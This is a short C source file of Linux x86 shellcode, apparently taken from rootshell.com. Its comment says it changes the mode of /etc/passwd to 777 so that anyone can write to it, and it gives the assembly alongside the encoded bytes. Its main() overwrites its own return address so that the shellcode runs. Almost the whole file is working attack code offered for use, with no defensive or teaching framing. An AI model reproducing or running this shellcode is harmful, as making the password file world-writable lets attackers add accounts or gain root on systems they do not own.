/*  [from http://www.rootshell.com/ ]
    
    changes mode on /etc/passwd to 777 
    making it writeable by anyone.

   jmp rootshell
   coded_by_bmV:
      popl %edi
      call yo
   rootshell:
      call coded_by_bmV
   yo: 
      xorl %ebx,%ebx             
      movb $(phile-yo),%bl 
      addl %edi,%ebx           
      xorb %al,%al 
      movb %al,11(%ebx)
      xorl %ecx,%ecx
      movw $00777,%cx
      xorl %eax,%eax             
      movb $0xf,%al
      int $0x80             
      xorl %eax,%eax
      movb $0x01,%al       
      int $0x80
   phile:
   .ascii \"/etc/passwd\"
*/

char shellcode[]=
   "\xeb\x06\x5f\xe8\x05\x00\x00\x00\xe8\xf5\xff\xff\xff\x31"
   "\xdb\xb3\x1d\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9"
   "\xff\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
   "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x89\xec\x5d\xc3";

void main()
{
   int *ret;
  
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}